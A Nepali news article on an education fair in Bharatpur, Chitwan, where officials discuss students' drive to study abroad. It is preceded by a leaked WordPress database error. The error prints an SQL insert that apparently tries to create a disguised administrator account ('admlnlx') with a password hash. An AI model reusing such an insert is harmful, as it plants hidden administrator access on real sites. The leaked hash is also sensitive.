WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0UrUOf0ODI2tZM3/QhsBYB9lgjznL/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:17:39', '', 'admlnlx', 'admlnlx')
चितवन, पुस १३–
शिक्षा मन्त्रालयका सचिव शान्तबहादुर श्रेष्ठ विद्यार्थीहरुको विदेश मोहले देशलाई चुनौती थपिएको बताउनुभएको छ ।
शैक्षिक परामर्श व्यवसायी संघ (इक्यान) चितवनको आयोजनामा आज (बुधबार)देखि भरतपुरमा सुरु भएको दोस्रो इक्यान शैक्षिक मेलाको समुद्घाटन गर्दै सचिव श्रेष्ठले पछिल्लो समय विदेश जाने फेशन जस्तै बनेकाले विद्यार्थीहरुलाई नेपालमै टिकाई राख्न चुनौती थपिएको बताउनुभयो । उहाँले गुणस्तरीय प्राविधिक शिक्षासंगै विश्वबजारमै बिक्ने खालको शिक्षा आवश्यक रहेको बताउनुभयो । सचिव श्रेष्ठले अनुसन्धानमा आधारित रोजगारिमुलक शिक्षाको आवश्यकता रहेको औल्याउँदै अब सरकारले एक हजार वटा मोडेल स्कूल संचालनको तयारीमा लागेको जानकारी दिनुभयो । सो विद्यालयमा विदेशमा लागुहुने कोर्षका कक्षाहरु संचालन हुने जानकारी दिनुभयो ।

उद्घाटन समारोहमा बोल्दै शैक्षिक परामर्श व्यवसायी संघ (इक्यान)का केन्द्रीय अध्यक्ष प्रकाश पाण्डेले सरकारले शैक्षिक परामर्श व्यवसायीहरुको वर्गीकरण गर्न नहुने बताउनुभयो । उहाँले सबै व्यवसायीले दिने सेवा एउटै भएकाले वर्गीकरणको आवश्यकता नभएको बताउनुभयो । अध्यक्ष पाण्डेले सधै शैक्षिक परामर्श व्यवसायीहरुलाई नेपाली विद्यार्थीहरुलाई विदेश पठाउने काम मात्रै गर्ने भन्ने भन्ने आरोप लाग्ने गरेको भन्दै अब नेपालमा विदेशबाट विद्यार्थी ल्याउने वातावारण सरकारले बनाउनुपर्ने बताउनुभयो ।

यस्तै कार्यक्रममा बोल्दै वीरेन्द्र बहुमुखी क्याम्पस भरतपुरका क्याम्पस प्रमुख गोविन्द सापकोटाले नेपाली विद्यार्थीहरुलाई सकभर छात्रवृत्ति कोटामा पठाईनु पर्ने बताउनुभयो । उहाँले वीरेन्द्र क्याम्पसले पनि नयाँ–नयाँ कार्यक्रमहरु ल्याउन लागेको भन्दै अब विदेशबाट विद्यार्थीहरुलाई नेपाल ल्याउने काम इक्यानले गर्नुपर्ने बताउनुभयो । कार्यक्रममा इक्यानका पूर्व अध्यक्ष राजेन्द्र बराललगायतले बोल्नु भएको थियो । कार्यक्रममा इक्यानका केन्द्रीय उपाध्यक्ष एवंम मेला संयोजन विभागका विष्णुहरि पाण्डेले स्वागत मन्तव्य व्यक्त गर्नुभएको थियो । कार्यक्रमको उद्घाटन सत्र इक्यान चितवनका अध्यक्ष जीवन रिजालको अध्यक्षतामा सम्पन्न भएको थियो ।